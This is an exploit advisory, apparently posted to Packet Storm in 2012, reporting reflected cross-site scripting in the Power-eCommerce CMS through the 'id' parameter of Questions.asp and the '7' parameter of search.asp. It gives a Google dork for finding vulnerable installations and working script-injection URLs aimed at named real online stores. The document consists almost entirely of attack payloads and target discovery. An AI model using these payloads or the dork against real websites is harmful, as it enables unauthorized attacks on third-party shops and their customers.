Power-eCommerce CMS Cross Site Scripting

2012-08-25T00:00:00
ID PACKETSTORM:115896
Type packetstorm
Reporter Crim3R
Modified 2012-08-25T00:00:00

Description

                                        
                                            `###################################################################################  
  
# Exploit Title: Power-eCommerce CMS Cross Site Scripting Vulnerability  
#  
# Google Dork:intext:"Site Powered by: Power-eCommerce.com"  
#  
# Date: 08/24/2012  
#  
# Author: Crim3R  
#  
# Vendor Home : http://www.power-ecommerce.com/  
#  
# Tested on: all  
#  
###################################################################################  
  
  
========================================  
id parametr in Questions.asp and 7 in search.asp are Vulnerable to xss   
  
D3M0 :   
  
http://store.harptennis.com//Questions.asp?id="><script>alert(0);</script>  
http://store.harptennis.com/search.asp?7="><script>alert(0);</script>&Search=Search  
  
http://www.cheaphpprinters.com/search.asp?7="><script>alert(0);</script>&Search=Search  
  
  
===============Crim3R@Att.Net===========  
  
$home = %00  
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir  
`